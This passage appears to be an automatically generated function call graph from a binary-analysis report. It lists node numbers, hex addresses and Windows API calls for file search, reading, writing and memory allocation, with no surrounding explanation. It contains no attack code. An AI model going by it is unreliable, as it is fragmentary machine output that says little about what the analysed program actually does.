4165f9 36770 407a18 ctype 11 API calls 36767->36770 36771 4165c2 36768->36771 36772 41658d 36769->36772 36773 416601 36770->36773 36774 408604 ctype 13 API calls 36771->36774 36778 407a18 ctype 11 API calls 36772->36778 36775 408604 ctype 13 API calls 36773->36775 36777 4165cf 36774->36777 36779 41660e 36775->36779 36776 416638 36780 407a18 ctype 11 API calls 36776->36780 36783 407a18 ctype 11 API calls 36777->36783 36778->36787 36785 407a18 ctype 11 API calls 36779->36785 36781 41663d 36780->36781 36782 408604 ctype 13 API calls 36781->36782 36784 41664a 36782->36784 36783->36787 36786 407a18 ctype 11 API calls 36784->36786 36785->36787 36786->36787 36787->36737 36788 415c6d 11 API calls 36788->36789 36789->36728 36789->36732 36789->36734 36789->36735 36789->36738 36789->36740 36789->36744 36789->36747 36789->36749 36789->36750 36789->36752 36789->36753 36789->36755 36789->36761 36789->36765 36789->36767 36789->36776 36789->36788 37152 418a23 __EH_prolog 36789->37152 37203 46c55c 36789->37203 37210 416922 __EH_prolog 36789->37210 36791->36471 36792->36484 36794 40860f 36793->36794 36795 40862d ctype 13 API calls 36794->36795 36796 408617 36795->36796 36797 407a18 ctype 11 API calls 36796->36797 36798 40861f 36797->36798 36798->36539 36799->36471 36800->36504 36801->36471 36802->36502 36803->36536 36804->36529 36805->36551 36806->36556 36807->36559 36808->36595 36809->36595 36810->36576 36811->36598 36812->36569 36813->36571 36814->36591 36815->36526 36816->36499 36817->36607 36818->36582 36819->36536 36820->36513 36821->36536 36823 404d2a 36822->36823 36834 404e10 __EH_prolog 36823->36834 36826 401e9a 11 API calls 36827 404d7b 36826->36827 36828 401e9a 11 API calls 36827->36828 36829 404da0 36828->36829 36830 401e9a 11 API calls 36829->36830 36831 404dcb 36830->36831 36832 401e9a 11 API calls 36831->36832 36833 404cc8 36832->36833 36833->36624 36835 401e9a 11 API calls 36834->36835 36836 404e36 36835->36836 36837 401e9a 11 API calls 36836->36837 36838 404e4a 36837->36838 36839 401e9a 11 API calls 36838->36839 36840 404e5f 36839->36840 36841 401e9a 11 API calls 36840->36841 36842 404e74 36841->36842 36843 401e9a 11 API calls 36842->36843 36844 404e89 36843->36844 36845 401e9a 11 API calls 36844->36845 36846 404ea1 36845->36846 36847 401e9a 11 API calls 36846->36847 36848 404d5c 36847->36848 36848->36826 36850 406d68 36849->36850 36850->36630 36852 410a66 36851->36852 36853 401e9a 11 API calls 36852->36853 36854 410a86 36853->36854 36855 407a18 ctype 11 API calls 36854->36855 36856 410aaf 36855->36856 36857 407a18 ctype 11 API calls 36856->36857 36858 410ab7 36857->36858 36858->36636 36860 411937 36859->36860 36861 407a18 ctype 11 API calls 36860->36861 36862 41040e 36860->36862 36861->36862 36862->36637 36864 410b28 36863->36864 36871 410b5b 36863->36871 36864->36871 36931 410ac9 25 API calls 36864->36931 36865 410bb5 36865->36646 36868 410b4f 36869 407a18 ctype 11 API calls 36868->36869 36869->36871 36871->36865 36872 407a18 ctype 11 API calls 36871->36872 36932 410bdc 26 API calls ctype 36871->36932 36933 410ac9 25 API calls 36871->36933 36872->36871 36874 411051 36873->36874 36875 410635 36873->36875 36874->36875 36934 411068 __EH_prolog 36874->36934 36877 40925b 36875->36877 36878 40926b 36877->36878 36879 4092a4 36878->36879 36991 408ec6 22 API calls 36878->36991 36879->36671 36879->36676 36882 41005e 36881->36882 36992 415349 __EH_prolog 36882->36992 36885 410278 36885->36692 36886 408604 ctype 13 API calls 36887 4100d1 36886->36887 36888 40862d ctype 13 API calls 36887->36888 36889 4100e0 36888->36889 36890 408604 ctype 13 API calls 36889->36890 36898 4100ec 36890->36898 36891 410133 37003 4102df 14 API calls ctype 36891->37003 36895 4101ba 37006 4195a6 13 API calls ctype 36895->37006 36896 407a18 ctype 11 API calls 36896->36898 36897 401e9a 11 API calls 36905 410142 36897->36905 36898->36891 36898->36896 37001 41528b 12 API calls 36898->37001 37002 406796 12 API calls 36898->37002 36901 4101da 37007 40867e 36901->37007 36905->36895 36905->36897 36907 407a18 ctype 11 API calls 36905->36907 37004 40a5af 24 API calls 36905->37004 37005 406796 12 API calls 36905->37005 36906 40867e 11 API calls 36911 4101f0 36906->36911 36907->36905 36908 410222 36910 408604 ctype 13 API calls 36908->36910 36909 406796 12 API calls 36909->36911 36912 41022e 36910->36912 36911->36908 36911->36909 36913 40862d ctype 13 API calls 36912->36913 36914 41023d 36913->36914 36915 408604 ctype 13 API calls 36914->36915 36916 410249 36915->36916 36917 40862d ctype 13 API calls 36916->36917 36918 41025b 36917->36918 36919 408604 ctype 13 API calls 36918->36919 36920 410267 36919->36920 36920->36692 36921->36640 36922->36644 36923->36662 36924->36661 36925->36663 36926->36685 36927->36688 36928->36690 36929->36654 36930->36674 36931->36868 36932->36871 36933->36871 36947 411215 36934->36947 36937 411215 21 API calls 36938 411091 36937->36938 36944 4110ae 36938->36944 36951 411194 __EH_prolog 36938->36951 36940 411185 36940->36874 36942 411068 27 API calls 36945 411130 36942->36945 36943 409391 16 API calls 36943->36944 36944->36943 36944->36945 36945->36940 36945->36942 36946 407a18 11 API calls ctype 36945->36946 36961 411bd0 12 API calls ctype 36945->36961 36946->36945 36948 411223 36947->36948 36949 411087 36947->36949 36948->36949 36950 411194 21 API calls 36948->36950 36949->36937 36950->36948 36952 411206 36951->36952 36953 4111ad 36951->36953 36952->36938 36953->36952 36962 40b431 __EH_prolog 36953->36962 36955 4111dd 36956 407a18 ctype 11 API calls 36955->36956 36957 4111ec 36956->36957 36958 4111fe 36957->36958 36959 401e26 11 API calls 36957->36959 36960 407a18 ctype 11 API calls 36958->36960 36959->36958 36960->36952 36961->36945 36963 40b44d 36962->36963 36967 40b451 36963->36967 36968 40b174 __EH_prolog 36963->36968 36965 40b4b3 36987 40b154 36965->36987 36967->36955 36969 40b154 FindClose 36968->36969 36970 40b18c 36969->36970 36971 40b1f8 36970->36971 36972 40b20f 36970->36972 36973 40b19f FindFirstFileW 36970->36973 36971->36965 36975 40b21a AreFileApisANSI 36972->36975 36973->36971 36974 40b1b9 36973->36974 36976 401e9a 11 API calls 36974->36976 36990 40822f 13 API calls 36975->36990 36978 40b1cc 36976->36978 36982 40b1ec 36978->36982 36983 40b1de FindFirstFileW 36978->36983 36979 40b238 FindFirstFileA 36980 407a18 ctype 11 API calls 36979->36980 36981 40b252 36980->36981 36984 407a18 ctype 11 API calls 36981->36984 36985 407a18 ctype 11 API calls 36982->36985 36983->36982 36986 40b25e 36984->36986 36985->36971 36986->36971 36988 40b15e FindClose 36987->36988 36989 40b169 36987->36989 36988->36989 36989->36967 36990->36979 36991->36878 36993 415401 36992->36993 37000 41536d 36992->37000 37084 4152e1 11 API calls 36993->37084 36995 4100b4 36995->36885 36995->36886 36998 40862d ctype 13 API calls 36998->37000 36999 408604 ctype 13 API calls 36999->37000 37000->36993 37000->36995 37000->36998 37000->36999 37011 415420 __EH_prolog 37000->37011 37083 415303 12 API calls 37000->37083 37001->36898 37002->36898 37003->36905 37004->36905 37005->36905 37006->36901 37009 408722 37007->37009 37010 408692 37007->37010 37008 407a18 ctype 11 API calls 37008->37009 37009->36906 37010->37008 37015 415441 37011->37015 37012 4158a9 37093 411bd0 12 API calls ctype 37012->37093 37014 4158b6 37016 407a18 ctype 11 API calls 37014->37016 37015->37012 37019 41547d 37015->37019 37056 4154d7 37015->37056 37068 4158da 37016->37068 37017 415870 37018 408604 ctype 13 API calls 37017->37018 37018->37019 37019->37000 37020 415b38 GetLastError 37022 415c6d 11 API calls 37020->37022 37021 40b431 20 API calls 37021->37056 37025 415b47 37022->37025 37023 415b52 37029 407a18 ctype 11 API calls 37023->37029 37024 415542 GetLastError 37085 415c6d 37024->37085 37101 406796 12 API calls 37025->37101 37026 40b431 20 API calls 37051 415723 37026->37051 37030 415b5d 37029->37030 37032 407a18 ctype 11 API calls 37030->37032 37031 4092a8 15 API calls 37031->37068 37034 415b6a 37032->37034 37033 415c6d 11 API calls 37033->37056 37037 40b154 FindClose 37034->37037 37035 406796 12 API calls 37035->37068 37036 415c6d 11 API calls 37036->37051 37037->37019 37038 406796 12 API calls 37038->37056 37039 41578c GetLastError 37039->37051 37040 407a18 11 API calls ctype 37040->37051 37043 407a18 ctype 11 API calls 37046 415ba1 37043->37046 37044 407a18 11 API calls ctype 37044->37056 37048 407a18 ctype 11 API calls 37046->37048 37047 40862d ctype 13 API calls 37047->37051 37050 415bad 37048->37050 37049 408604 ctype 13 API calls 37049->37051 37053 40b154 FindClose 37050->37053 37051->37017 37051->37026 37051->37036 37051->37039 37051->37040 37051->37047 37051->37049 37054 415881 37051->37054 37091 406796 12 API calls 37051->37091 37092 415bca 33 API calls ctype 37051->37092 37052 40862d 13 API calls ctype 37052->37068 37053->37019 37057 407a18 ctype 11 API calls 37054->37057 37055 408604 13 API calls ctype 37055->37056 37056->37021 37056->37024 37056->37033 37056->37038 37056->37044 37056->37051 37056->37055 37070 415795 37056->37070 37071 40862d 13 API calls ctype 37056->37071 37088 408e8a 12 API calls 37056->37088 37089 4150e0 13 API calls ctype 37056->37089 37090 415bca 33 API calls ctype 37056->37090 37082 4157be 37057->37082 37059 408e8a 12 API calls 37059->37068 37060 407a18 ctype 11 API calls 37061 415894 37060->37061 37062 408604 ctype 13 API calls 37061->37062 37062->37019 37063 408604 13 API calls ctype 37063->37068 37065 407a18 ctype 11 API calls 37065->37068 37068->37020 37068->37023 37068->37031 37068->37035 37068->37052 37068->37059 37068->37063 37068->37065 37073 415b7b 37068->37073 37081 415b77 37068->37081 37094 4150e0 13 API calls ctype 37068->37094 37095 409500 37068->37095 37100 415bca 33 API calls ctype 37068->37100 37072 40862d ctype 13 API calls 37070->37072 37071->37056 37074 4157a4 37072->37074 37075 40862d ctype 13 API calls 37073->37075 37076 408604 ctype 13 API calls 37074->37076 37078 415b87 37075->37078 37077 4157b3 37076->37077 37079 407a18 ctype 11 API calls 37077->37079 37080 408604 ctype 13 API calls 37078->37080 37079->37082 37080->37081 37081->37043 37082->37060 37083->37000 37084->36995 37102 408656 37085->37102 37088->37056 37089->37056 37090->37056 37091->37051 37092->37051 37093->37014 37094->37068 37096 40867e 11 API calls 37095->37096 37097 409518 37096->37097 37098 409530 37097->37098 37106 406796 12 API calls 37097->37106 37098->37068 37100->37068 37101->37023 37103 40867d 37102->37103 37104 40865e 37102->37104 37103->37056 37105 40867e 11 API calls 37104->37105 37105->37103 37106->37097 37108 40fa67 37107->37108 37110 40fa33 37107->37110 37108->36697 37109 407a18 ctype 11 API calls 37109->37108 37110->37109 37112 417807 37111->37112 37113 415c6d 11 API calls 37112->37113 37114 41782a 37113->37114 37114->36697 37116 407a18 ctype 11 API calls 37115->37116 37117 405ad5 37116->37117 37118 40862d ctype 12 API calls 37117->37118 37119 405aed 37118->37119 37120 408604 ctype 12 API calls 37119->37120 37121 405af8 37120->37121 37122 407a18 ctype 11 API calls 37121->37122 37123 405b00 37122->37123 37123->36697 37128 4055c0 37124->37128 37133 42751a 37124->37133 37125 404692 37125->36712 37131 4055d7 37128->37131 37129 40560f 37129->37125 37130 405aaf 13 API calls 37130->37131 37131->37129 37131->37130 37132 407a18 ctype 11 API calls 37131->37132 37132->37131 37134 427531 37133->37134 37135 427569 37134->37135 37137 407a18 ctype 11 API calls 37134->37137 37138 423db2 __EH_prolog 37134->37138 37135->37125 37137->37134 37139 408604 ctype 12 API calls 37138->37139 37140 423dd7 37139->37140 37141 408604 ctype 12 API calls 37140->37141 37142 423de6 37141->37142 37143 40862d ctype 12 API calls 37142->37143 37144 423e00 37143->37144 37145 408604 ctype 12 API calls 37144->37145 37146 423e0b 37145->37146 37147 40862d ctype 12 API calls 37146->37147 37148 423e22 37147->37148 37149 408604 ctype 12 API calls 37148->37149 37150 423e2d 37149->37150 37150->37134 37151->36714 37153 418a4a 37152->37153 37154 418a5c 37153->37154 37323 418c9d 12 API calls 37153->37323 37156 401e9a 11 API calls 37154->37156 37157 418a93 37156->37157 37158 401e9a 11 API calls 37157->37158 37159 418aaa 37158->37159 37160 401e9a 11 API calls 37159->37160 37161 418ac1 37160->37161 37201 418b88 37161->37201 37262 40a28c __EH_prolog 37161->37262 37165 418bb3 37168 418bba 37165->37168 37169 418bee 37165->37169 37166 418b27 37173 401e26 11 API calls 37166->37173 37167 418aec GetLastError 37170 407a18 ctype 11 API calls 37167->37170 37171 407a18 ctype 11 API calls 37168->37171 37324 406796 12 API calls 37169->37324 37172 418afc 37170->37172 37174 418bc2 37171->37174 37175 407a18 ctype 11 API calls 37172->37175 37177 418b43 37173->37177 37178 407a18 ctype 11 API calls 37174->37178 37179 418b04 37175->37179 37181 407a18 ctype 11 API calls 37177->37181 37182 418bca 37178->37182 37183 407a18 ctype 11 API calls 37179->37183 37180 418c0c 37184 407a18 ctype 11 API calls 37180->37184 37185 418b4f 37181->37185 37186 407a18 ctype 11 API calls 37182->37186 37202 418b0c 37183->37202 37191 418c18 37184->37191 37188 401e26 11 API calls 37185->37188 37186->37202 37187 418c4e 37189 407a18 ctype 11 API calls 37187->37189 37192 418b6c 37188->37192 37190 418c6b 37189->37190 37193 407a18 ctype 11 API calls 37190->37193 37191->37187 37199 407a18 ctype 11 API calls 37191->37199 37325 406796 12 API calls 37191->37325 37195 407a18 ctype 11 API calls 37192->37195 37196 418c73 37193->37196 37197 418b78 37195->37197 37198 407a18 ctype 11 API calls 37196->37198 37301 418e2d __EH_prolog 37197->37301 37198->37202 37199->37191 37310 418554 __EH_prolog 37201->37310 37202->36789 37611 46c2a4 37203->37611 37205 46c568 37207 46c56e 37205->37207 37617 4704bb 37205->37617 37627 46c2f6 37207->37627 37209 46c591 37209->36789 37227 41694e 37210->37227 37211 416971 37214 408604 ctype 13 API calls 37211->37214 37212 4169f5 37212->37211 37217 416a25 37212->37217 37213 401e9a 11 API calls 37213->37227 37215 416a0e 37214->37215 37215->36789 37216 416a15 37218 407a18 ctype 11 API calls 37216->37218 37220 407a18 ctype 11 API calls 37217->37220 37219 416a1f 37218->37219 37224 408604 ctype 13 API calls 37219->37224 37221 416a82 37220->37221 37222 407a18 ctype 11 API calls 37221->37222 37225 416a8e 37222->37225 37224->37215 37226 416b09 37225->37226 37693 409d7c __EH_prolog 37225->37693 37720 411c21 37226->37720 37227->37211 37227->37212 37227->37213 37227->37216 37227->37217 37230 415c6d 11 API calls 37227->37230 37231 407a18 ctype 11 API calls 37227->37231 37831 408e6d 18 API calls 37227->37831 37230->37227 37231->37227 37233 416b3b 37728 4192f5 __EH_prolog 37233->37728 37234 416aa1 GetLastError 37236 416aad 37234->37236 37244 401e26 11 API calls 37236->37244 37238 416b68 37242 416bd4 37238->37242 37253 416b83 37238->37253 37239 416b4c 37240 407a18 ctype 11 API calls 37239->37240 37241 416af6 37240->37241 37243 40862d ctype 13 API calls 37241->37243 37753 4290c5 __EH_prolog 37242->37753 37794 4297ca 37242->37794 37246 416c07 37243->37246 37247 416ade 37244->37247 37245 416bd2 37252 416be9 37245->37252 37258 46c55c 27 API calls 37245->37258 37248 408604 ctype 13 API calls 37246->37248 37249 407a18 ctype 11 API calls 37247->37249 37248->37219 37250 416ae6 37249->37250 37251 407a18 ctype 11 API calls 37250->37251 37254 416aee 37251->37254 37255 407a18 ctype 11 API calls 37252->37255 37256 40c20f VariantClear 37253->37256 37257 407a18 ctype 11 API calls 37254->37257 37255->37241 37256->37245 37257->37241 37258->37252 37261->36727 37263 40a39b 37262->37263 37264 40a2b8 37262->37264 37327 401eee 11 API calls ctype 37263->37327 37265 40a2cd GetFullPathNameW 37264->37265 37267 401e9a 11 API calls 37264->37267 37269 40a2f3 37265->37269 37267->37265 37268 40a3ae 37328 409ad5 15 API calls ctype 37268->37328 37272 40a328 GetFullPathNameW 37269->37272 37274 401e9a 11 API calls 37269->37274 37276 40a343 37269->37276 37280 40a396 37269->37280 37271 40a3bc 37329 40a20f 13 API calls 37271->37329 37272->37276 37274->37272 37275 40a3d0 37278 407a18 ctype 11 API calls 37275->37278 37276->37280 37326 40a4a1 12 API calls ctype 37276->37326 37279 40a3e4 37278->37279 37281 40a3f9 37279->37281 37282 40a3e9 37279->37282 37280->37166 37280->37167 37330 4098a8 14 API calls 37281->37330 37283 407a18 ctype 11 API calls 37282->37283 37283->37280 37285 40a415 37286 407a18 ctype 11 API calls 37285->37286 37287 40a421 37286->37287 37331 4098a8 14 API calls 37287->37331 37289 40a43e 37290 407a18 ctype 11 API calls 37289->37290 37291 40a44a 37290->37291 37292 401e26 11 API calls 37291->37292 37293 40a46b 37292->37293 37294 407a18 ctype 11 API calls 37293->37294 37295 40a473 37294->37295 37296 407a18 ctype 11 API calls 37295->37296 37297 40a47b 37296->37297 37298 407a18 ctype 11 API calls 37297->37298 37299 40a483 37298->37299 37300 407a18 ctype 11 API calls 37299->37300 37300->37280 37302 401e26 11 API calls 37301->37302 37303 418e4c 37302->37303 37304 40b431 20 API calls 37303->37304 37305 418e68 37304->37305 37306 407a18 ctype 11 API calls 37305->37306 37307 418e7c 37306->37307 37308 40862d ctype 13 API calls 37307->37308 37309 418e9e 37308->37309 37309->37201 37320 41856f 37310->37320 37311 401e26 11 API calls 37311->37320 37312 418814 37313 40c20f VariantClear 37312->37313 37321 41857a 37313->37321 37314 41898e 37316 40c20f VariantClear 37314->37316 37316->37321 37318 4189b9 12 API calls 37318->37320 37320->37311 37320->37312 37320->37314 37320->37318 37320->37321 37322 418f34 13 API calls 37320->37322 37332 4183fd __EH_prolog 37320->37332 37338 40c20f 37320->37338 37342 417bae __EH_prolog 37320->37342 37321->37165 37322->37320 37323->37154 37324->37180 37325->37191 37326->37280 37327->37268 37328->37271 37329->37275 37330->37285 37331->37289 37335 418446 37332->37335 37337 418422 37332->37337 37333 417bae 147 API calls 37334 4184aa 37333->37334 37334->37320 37336 418486 GetLastError 37335->37336 37335->37337 37336->37334 37337->37333 37341 40c214 37338->37341 37339 40c24c 37339->37320 37340 40c235 VariantClear 37340->37320 37341->37339 37341->37340 37343 417bce 37342->37343 37344 401e9a 11 API calls 37343->37344 37349 417c00 37344->37349 37345 417c54 37346 417c70 37345->37346 37351 417c80 37345->37351 37347 415c6d 11 API calls 37346->37347 37390 417c7b 37347->37390 37348 417cd7 37350 418275 37348->37350 37352 408642 ctype 13 API calls 37348->37352 37359 417cf0 37348->37359 37349->37345 37356 401e26 11 API calls 37349->37356 37355 408604 ctype 13 API calls 37350->37355 37351->37348 37358 415c6d 11 API calls 37351->37358 37480 408767 11 API calls 37351->37480 37352->37359 37353 417d14 37370 40fa26 11 API calls 37353->37370 37354 417e00 37360 408604 ctype 13 API calls 37354->37360 37361 418292 37355->37361 37357 417c48 37356->37357 37363 407a18 ctype 11 API calls 37357->37363 37358->37351 37359->37353 37366 417fba 37359->37366 37364 417e0c 37360->37364 37365 407a18 ctype 11 API calls 37361->37365 37363->37345 37368 407a18 ctype 11 API calls 37364->37368 37369 41829a 37365->37369 37367 40fa26 11 API calls 37366->37367 37381 417fb5 37366->37381 37372 417fff 37367->37372 37373 417e14 37368->37373 37374 407a18 ctype 11 API calls 37369->37374 37371 417d47 37370->37371 37378 417d58 37371->37378 37481 40fa74 37371->37481 37379 418028 37372->37379 37383 40fa74 5 API calls 37372->37383 37376 407a18 ctype 11 API calls 37373->37376 37375 417e1c 37374->37375 37375->37320 37376->37375 37377 408604 ctype 13 API calls 37380 4183e4 37377->37380 37388 407a18 ctype 11 API calls 37378->37388 37384 407a18 ctype 11 API calls 37379->37384 37385 407a18 ctype 11 API calls 37380->37385 37381->37390 37393 407a18 ctype 11 API calls 37381->37393 37387 418024 37383->37387 37437 417d95 37384->37437 37389 4183ec 37385->37389 37387->37379 37416 41803f 37387->37416 37391 417d85 37388->37391 37392 407a18 ctype 11 API calls 37389->37392 37390->37350 37390->37354 37404 4182ae 37390->37404 37390->37437 37447 40d340 37390->37447 37453 43394a __EH_prolog 37390->37453 37457 42d57a 37390->37457 37463 42b338 __EH_prolog 37390->37463 37395 408604 ctype 13 API calls 37391->37395 37397 4183f4 37392->37397 37401 41811d 37393->37401 37394 417d9a 37398 40fa26 11 API calls 37394->37398 37395->37437 37396 4180b8 37399 407a18 ctype 11 API calls 37396->37399 37397->37320 37400 417dbb 37398->37400 37399->37381 37402 417dd9 37400->37402 37428 417e32 37400->37428 37405 407a18 ctype 11 API calls 37401->37405 37403 407a18 ctype 11 API calls 37402->37403 37407 417de4 37403->37407 37406 40c20f VariantClear 37404->37406 37404->37437 37405->37390 37409 418311 37406->37409 37410 407a18 ctype 11 API calls 37407->37410 37408 417f4a 37411 417f72 37408->37411 37417 415c6d 11 API calls 37408->37417 37419 418388 37409->37419 37420 41832c 37409->37420 37413 417def 37410->37413 37412 40862d ctype 13 API calls 37411->37412 37414 417f7a 37412->37414 37415 408604 ctype 13 API calls 37413->37415 37421 407a18 ctype 11 API calls 37414->37421 37415->37354 37416->37396 37485 408767 11 API calls 37416->37485 37417->37408 37487 414f74 13 API calls ctype 37419->37487 37486 414f74 13 API calls ctype 37420->37486 37423 417f99 37421->37423 37427 407a18 ctype 11 API calls 37423->37427 37424 415c6d 11 API calls 37424->37428 37425 4183af 37429 401e26 11 API calls 37425->37429 37431 417fa4 37427->37431 37428->37408 37428->37424 37432 4183bc 37429->37432 37430 41835e 37433 401e26 11 API calls 37430->37433 37434 408604 ctype 13 API calls 37431->37434 37435 407a18 ctype 11 API calls 37432->37435 37436 41836b 37433->37436 37434->37381 37435->37437 37438 407a18 ctype 11 API calls 37436->37438 37437->37377 37439 418373 37438->37439 37440 407a18 ctype 11 API calls 37439->37440 37441 41837b 37440->37441 37442 407a18 ctype 11 API calls 37441->37442 37442->37437 37448 40d34c 37447->37448 37449 40d355 37447->37449 37448->37449 37488 40ba47 37448->37488 37449->37390 37455 43395f 37453->37455 37454 433973 37454->37390 37455->37454 37494 42a3cd __EH_prolog 37455->37494 37458 42d58b 37457->37458 37462 40d340 3 API calls 37458->37462 37459 42d59f 37460 42d5af 37459->37460 37509 42d33c __EH_prolog 37459->37509 37460->37390 37462->37459 37464 42b359 37463->37464 37465 40862d ctype 13 API calls 37464->37465 37466 42b364 37465->37466 37467 42d57a 17 API calls 37466->37467 37468 42b3b9 37467->37468 37469 401e9a 11 API calls 37468->37469 37472 42b3c0 37468->37472 37470 42b413 37469->37470 37519 42f024 __EH_prolog 37470->37519 37472->37390 37474 42b42d 37475 407a18 ctype 11 API calls 37474->37475 37475->37472 37476 42b46b 37477 407a18 ctype 11 API calls 37476->37477 37478 42b493 37477->37478 37522 430b45 15 API calls ctype 37478->37522 37480->37351 37482 40fa88 37481->37482 37483 40fab7 37482->37483 37589 40d071 37482->37589 37483->37378 37483->37394 37485->37396 37486->37430 37487->37425 37489 40ba53 37488->37489 37490 40ba6f SetFilePointer 37488->37490 37489->37490 37491 40ba9d 37490->37491 37492 40ba93 GetLastError 37490->37492 37493 40d2c2 GetLastError 37491->37493 37492->37491 37493->37449 37501 421886 __EH_prolog 37494->37501 37498 42a415 37505 425658 37498->37505 37502 425658 GetSystemInfo 37501->37502 37503 4218b8 37502->37503 37504 42a7a4 __EH_prolog 37503->37504 37504->37498 37508 40c5f4 GetSystemInfo 37505->37508 37507 42567a 37507->37454 37508->37507 37516 40fac0 37509->37516 37511 42d372 37511->37460 37512 42d35f 37512->37511 37513 40fa26 11 API calls 37512->37513 37514 42d398 37513->37514 37515 407a18 ctype 11 API calls 37514->37515 37515->37511 37517 40fa74 5 API calls 37516->37517 37518 40fad3 37517->37518 37518->37512 37523 42ec5c __EH_prolog 37519->37523 37522->37472 37526 42ec7b 37523->37526 37524 42b427 37524->37474 37524->37476 37525 42ee68 37525->37524 37527 40fa26 11 API calls 37525->37527 37526->37524 37530 40fac0 5 API calls 37526->37530 37534 42ed7c 37526->37534 37528 42ee8d 37527->37528 37529 40fac0 5 API calls 37528->37529 37532 42ee9a 37529->37532 37530->37534 37531 407a18 ctype 11 API calls 37531->37524 37543 42ee9e 37532->37543 37547 42d093 37532->37547 37534->37524 37546 40d340 3 API calls 37534->37546 37535 42eefe 37545 42efa2 37535->37545 37550 42e01c __EH_prolog 37535->37550 37538 42ef67 37539 40862d ctype 13 API calls 37538->37539 37540 42efe9 37539->37540 37542 408604 ctype 13 API calls 37540->37542 37541 42ef63 37541->37538 37544 42d093 11 API calls 37541->37544 37542->37543 37543->37531 37544->37545 37588 42e3b2 133 API calls ctype 37545->37588 37546->37525 37548 42d01f 11 API calls 37547->37548 37549 42d0a6 37548->37549 37549->37535 37551 42e03b 37550->37551 37552 42de7c 17 API calls 37551->37552 37566 42e113 37552->37566 37553 42e2a3 37554 429925 14 API calls 37553->37554 37555 42e2b2 37554->37555 37557 408604 ctype 13 API calls 37555->37557 37556 407a18 ctype 11 API calls 37556->37566 37558 42e2be 37557->37558 37559 408604 ctype 13 API calls 37558->37559 37560 42e2cd 37559->37560 37561 408604 ctype 13 API calls 37560->37561 37562 42e2dc 37561->37562 37564 408604 ctype 13 API calls 37562->37564 37563 40fa26 11 API calls 37563->37566 37587 42e2eb 37564->37587 37565 40862d ctype 13 API calls 37567 42e300 37565->37567 37566->37553 37566->37556 37566->37563 37570 4264f7 125 API calls 37566->37570 37573 42e349 37566->37573 37568 408604 ctype 13 API calls 37567->37568 37569 42e30c 37568->37569 37571 408604 ctype 13 API calls 37569->37571 37570->37566 37572 42e31b 37571->37572 37574 408604 ctype 13 API calls 37572->37574 37576 429925 14 API calls 37573->37576 37575 42e32a 37574->37575 37577 408604 ctype 13 API calls 37575->37577 37578 42e366 37576->37578 37579 42e336 37577->37579 37580 408604 ctype 13 API calls 37578->37580 37579->37541 37581 42e372 37580->37581 37582 408604 ctype 13 API calls 37581->37582 37583 42e381 37582->37583 37584 408604 ctype 13 API calls 37583->37584 37585 42e390 37584->37585 37586 408604 ctype 13 API calls 37585->37586 37586->37587 37587->37565 37588->37538 37594 40d07e 37589->37594 37590 40d21c 37597 40d284 37590->37597 37601 40bc85 37590->37601 37593 40d1f6 37593->37590 37598 40ba47 2 API calls 37593->37598 37594->37590 37594->37593 37595 40ba47 2 API calls 37594->37595 37596 40d0b3 37594->37596 37594->37597 37605 4585c0 37594->37605 37608 40bc58 ReadFile 37594->37608 37595->37594 37596->37482 37609 40d2c2 GetLastError 37597->37609 37598->37590 37602 40bc92 37601->37602 37610 40bc58 ReadFile 37602->37610 37604 40bca3 37604->37597 37606 4585c4 37605->37606 37607 4585c7 VirtualAlloc 37605->37607 37606->37594 37607->37594 37608->37594 37609->37596 37610->37604 37612 46c2b1 37611->37612 37613 46c2c8 EnterCriticalSection 37611->37613 37612->37613 37614 46c2b8 37612->37614 37613->37205 37615 46e56a ctype 11 API calls 37614->37615 37616 46c2c6 37615->37616 37616->37205 37618 470555 37617->37618 37619 4704d1 37617->37619 37618->37207 37619->37618 37620 470536 37619->37620 37621 47059d 37619->37621 37623 47054d 37620->37623 37625 47055d 37620->37625 37622 4702cb 25 API calls 37621->37622 37622->37618 37633 4702cb 37623->37633 37625->37618 37647 47165c 21 API calls 37625->37647 37628 46c303 37627->37628 37629 46c31a LeaveCriticalSection 37627->37629 37628->37629 37630 46c30a 37628->37630 37629->37209 37692 46e5cb LeaveCriticalSection 37630->37692 37632 46c318 37632->37209 37634 470318 37633->37634 37635 4702d8 37633->37635 37683 470646 12 API calls 37634->37683 37635->37634 37636 4702f3 37635->37636 37648 471359 37636->37648 37639 47031d 37684 47064f 12 API calls 37639->37684 37640 4702fa 37657 470330 37640->37657 37643 470328 37643->37618 37646 470310 37646->37618 37647->37618 37649 4713a7 EnterCriticalSection 37648->37649 37650 471384 37648->37650 37649->37640 37651 46e56a ctype 11 API calls 37650->37651 37652 47138b 37651->37652 37653 471392 InitializeCriticalSection 37652->37653 37654 47139f 37652->37654 37653->37654 37685 46e5cb LeaveCriticalSection 37654->37685 37656 4713a6 37656->37649 37658 470350 37657->37658 37679 470308 37657->37679 37659 470372 37658->37659 37660 470380 37658->37660 37686 4716c1 14 API calls 37659->37686 37662 47044f WriteFile 37660->37662 37669 47038e 37660->37669 37663 470466 37662->37663 37664 470471 GetLastError 37662->37664 37667 470416 37663->37667 37664->37667 37665 47037d 37665->37660 37666 47048a 37666->37679 37690 470646 12 API calls 37666->37690 37667->37666 37672 470428 37667->37672 37667->37679 37669->37666 37669->37667 37670 4703da WriteFile 37669->37670 37670->37669 37671 470444 GetLastError 37670->37671 37671->37667 37674 470430 37672->37674 37675 47047c 37672->37675 37673 4704a4 37691 47064f 12 API calls 37673->37691 37687 470646 12 API calls 37674->37687 37689 4705d3 12 API calls 37675->37689 37682 4713b8 LeaveCriticalSection 37679->37682 37680 470435 37688 47064f 12 API calls 37680->37688 37682->37646 37683->37639 37684->37643 37685->37656 37686->37665 37687->37680 37688->37679 37689->37679 37690->37673 37691->37679 37692->37632 37705 409d95 37693->37705 37695 409ee0 37698 401e26 11 API calls 37695->37698 37696 409e0c GetLastError 37697 409e89 37696->37697 37696->37705 37703 40b431 20 API calls 37697->37703 37708 409eed 37698->37708 37699 409dd7 37701 407a18 ctype 11 API calls 37699->37701 37700 409f51 37702 407a18 ctype 11 API calls 37700->37702 37718 409ecc 37701->37718 37702->37699 37704 409ea0 37703->37704 37706 409ea4 37704->37706 37707 409ed4 37704->37707 37705->37695 37705->37696 37705->37699 37705->37700 37715 401e26 11 API calls 37705->37715 37719 407a18 ctype 11 API calls 37705->37719 37832 409ccb __EH_prolog 37705->37832 37709 407a18 ctype 11 API calls 37706->37709 37710 407a18 ctype 11 API calls 37707->37710 37708->37700 37713 409ccb 20 API calls 37708->37713 37717 407a18 ctype 11 API calls 37708->37717 37711 409ebc 37709->37711 37710->37695 37712 407a18 ctype 11 API calls 37711->37712 37714 409ec4 37712->37714 37713->37708 37716 407a18 ctype 11 API calls 37714->37716 